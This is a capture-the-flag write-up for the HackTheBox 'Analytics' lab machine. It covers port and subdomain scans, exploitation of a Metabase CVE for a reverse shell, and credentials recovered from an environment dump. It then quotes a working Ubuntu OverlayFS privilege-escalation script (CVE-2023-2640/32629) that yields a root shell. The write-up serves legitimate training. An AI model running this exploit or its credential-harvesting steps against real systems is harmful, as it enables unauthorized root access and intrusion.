HackTheBox Writeup - Analytics Room

Title	Analytics
Description	Analytics is HackTheBox Easy Linux Based Machine.
Difficulty	Easy
Maker	7u9y and TheCyberGeek

Nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


└─$ nmap -sC -sV -oA nmap/analytics 10.10.11.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-25 20:13 EDT
Nmap scan report for 10.10.11.233
Host is up (0.038s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75🇩🇪4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://analytical.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds

I didn’t find anything interesting in the webpage, therefore I ran gobuster if I can find anything, but again, no luck.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


└─$ gobuster dir -u analytical.htb -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://analytical.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 178] [--> http://analytical.htb/css/]
/images               (Status: 301) [Size: 178] [--> http://analytical.htb/images/]
/index.html           (Status: 200) [Size: 17169]
/js                   (Status: 301) [Size: 178] [--> http://analytical.htb/js/]
Progress: 4614 / 4615 (99.98%)

Next logical step will be to find subdomains. I have used ffuf to find it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


└─$ ffuf -u http://analytical.htb -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.analytical.htb' -fs 154

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://analytical.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.analytical.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

data                    [Status: 200, Size: 77883, Words: 3574, Lines: 28, Duration: 86ms]

We got subdomain data. Adding this domain to /etc/hosts .

1
2
3


└─$ cat /etc/hosts
...
10.10.11.233    analytical.htb data.analytical.htb

When I visited the page, I can see a login form from metabase, next thing I did was to find CVE in Metabase and luckily I got one!

Untitled

CVE - CVE-2023-38646

You will get session-token from /api/session/properties on data subdomain.

Untitled

And boom, we got reverse shell!

User Flag

So after getting shell, I have checked user directory, there is no user.txt file. So I have started enumerating in different folders and lastly I found user and pass from env.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30


f3ac61d15a77:/$ env
env
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=f3ac61d15a77
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=4
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/usr/bin/env

User Flag: 76ea979945743429071a9891a2f47620

Root Flag

I have tried sudo -l but the user cannot use sudo. So I have ran linpeas. I found nothing interesting there.

I have checked the kernel version and found there is a public exploit for it CVE-2023–2640.

1
2


metalytics@analytics:/tmp$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


#!/bin/bash

# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023

echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

Run this script on the ssh machine, and we will get the root

Untitled

Root Flag: f40e47ddd824d9c5354612f67c919b9d